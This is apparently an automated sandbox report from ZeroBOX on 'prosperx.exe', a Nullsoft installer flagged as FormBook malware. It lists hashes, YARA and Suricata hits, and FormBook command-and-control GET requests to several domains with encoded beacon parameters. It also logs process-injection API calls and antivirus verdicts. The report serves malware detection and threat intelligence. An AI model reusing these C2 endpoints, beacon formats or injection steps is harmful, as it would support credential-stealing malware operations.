popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

prosperx.exe

  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 April 21, 2021, 10:06 a.m. April 21, 2021, 10:11 a.m.
Size 270.1KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 7f3fc7d086447a7e15e0d32bdd885cbc
SHA256 ce2ca323cae4838375c60305a3706e6828ab9fd8e30b65b1d0f4c87dbce0f29b
CRC32 1A36F713
ssdeep 6144:2YYvBRynyzaKqaFYI0QhvDqNvP1U+tcbVBupu:uBRynrEFY47qNvNUOmsU
Yara
  • escalate_priv - Escalade priviledges
  • screenshot - Take screenshot
  • win_registry - Affect system registries
  • win_token - Affect system token
  • win_private_profile - Affect private profile
  • win_files_operation - Affect private profile
  • PE_Header_Zero - PE File Signature Zero
  • IsPE32 - (no description)
  • IsWindowsGUI - (no description)
  • IsPacked - Entropy Check
  • HasOverlay - Overlay Check
  • HasRichSignature - Rich Signature Check

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49813 -> 166.62.108.196:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.102:49813 -> 166.62.108.196:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.102:49813 -> 166.62.108.196:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.102:49814 -> 151.101.194.159:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.102:49814 -> 151.101.194.159:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.102:49814 -> 151.101.194.159:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.102:49811 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.102:49811 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.102:49811 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.milehighcitygames.com/xcl/?Tj=fTgN0Et6e/d09dZDxyMRrypPZrJHAeTvzEoww+MZoNOHJJv+5czzLYqto9iAljufQKJX/SVl&SX=dn98bVV0hxJ4
suspicious_features GET method with no useragent header suspicious_request GET http://www.sophieberiault.com/xcl/?Tj=a/FLMe0ya/9YtTuUYok1B7vp/5Gr9at0LM/5wBD76A+xTQCdjVAZGPVTPrI0zw+67MuX3Fmg&SX=dn98bVV0hxJ4
suspicious_features GET method with no useragent header suspicious_request GET http://www.topgradetutors.net/xcl/?Tj=Iac5W1wUqDosYJk6LxlBM2b783u0YGGNexhKQMJrvkzTaDAxSdLOMJq38mi9FvZlS0tSXUVd&SX=dn98bVV0hxJ4
request GET http://www.milehighcitygames.com/xcl/?Tj=fTgN0Et6e/d09dZDxyMRrypPZrJHAeTvzEoww+MZoNOHJJv+5czzLYqto9iAljufQKJX/SVl&SX=dn98bVV0hxJ4
request GET http://www.sophieberiault.com/xcl/?Tj=a/FLMe0ya/9YtTuUYok1B7vp/5Gr9at0LM/5wBD76A+xTQCdjVAZGPVTPrI0zw+67MuX3Fmg&SX=dn98bVV0hxJ4
request GET http://www.topgradetutors.net/xcl/?Tj=Iac5W1wUqDosYJk6LxlBM2b783u0YGGNexhKQMJrvkzTaDAxSdLOMJq38mi9FvZlS0tSXUVd&SX=dn98bVV0hxJ4
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 1310720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c70000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02d70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02d71000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3172
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00920000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\nsj63.tmp\8yuqrvh.dll
file C:\Users\test22\AppData\Local\Temp\nsj63.tmp\8yuqrvh.dll
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 172.217.25.14
Process injection Process 2864 called NtSetContextThread to modify thread in remote process 3172
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4320112
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001fc
process_identifier: 3172
1 0 0
Bkav W32.AIDetect.malware1
Elastic malicious (high confidence)
McAfee Artemis!7F3FC7D08644
Cylance Unsafe
K7AntiVirus Trojan ( 005772cf1 )
K7GW Trojan ( 005772cf1 )
Cybereason malicious.8a776b
Symantec ML.Attribute.HighConfidence
APEX Malicious
Kaspersky VHO:Trojan-Spy.Win32.Noon.gen
NANO-Antivirus Trojan.Win32.Androm.ikbioz
Sophos Generic ML PUA (PUA)
McAfee-GW-Edition BehavesLike.Win32.Vopak.dc
FireEye Generic.mg.7f3fc7d086447a7e
SentinelOne Static AI - Malicious PE
Avira HEUR/AGEN.1140854
Gridinsoft Adware.Win32.Linkury.oa!s1
Cynet Malicious (score: 100)
AhnLab-V3 Malware/Gen.RL_Reputation.R364385
Ikarus Trojan.NSIS.Agent
Fortinet NSIS/Injector.EOYT!tr
CrowdStrike win/malicious_confidence_80% (D)
dead_host 103.101.188.123:80